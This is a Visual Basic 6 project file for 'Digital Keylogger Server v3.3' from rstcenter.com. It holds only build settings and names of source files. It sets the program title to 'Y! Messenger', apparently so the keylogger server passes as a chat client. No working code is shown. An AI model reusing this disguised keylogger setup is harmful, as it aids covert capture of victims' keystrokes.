Type=Exe
Form=Form1.frm
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\WINDOWS\system32\stdole2.tlb#OLE Automation
Class=CSocketMaster; CSocketMaster.cls
Module=modSocketMaster; modSocketMaster.bas
IconForm="Form1"
Startup="Form1"
HelpFile=""
Title="Y! Messenger"
ExeName32="Server.exe"
Path32="C:\Documents and Settings\Admin\Desktop"
Command32=""
Name="DigitalKeyloggerServerv3"
HelpContextID="0"
Description="Digital Keylogger Server v3.3"
CompatibleMode="0"
MajorVer=3
MinorVer=3
RevisionVer=3
AutoIncrementVer=1
ServerSupportFiles=0
VersionComments="(c) Nytro 2009"
VersionCompanyName="(c) http://rstcenter.com 2009"
VersionFileDescription="Digital Keylogger Server v3.3"
VersionLegalCopyright="(c) Nytro 2009"
VersionLegalTrademarks="(c) http://rstcenter.com 2009"
VersionProductName="Digital Keylogger Server v3.3"
CompilationType=0
OptimizationType=1
FavorPentiumPro(tm)=-1
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=-1
OverflowCheck=-1
FlPointCheck=-1
FDIVCheck=-1
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=0

[MS Transaction Server]
AutoRefresh=1
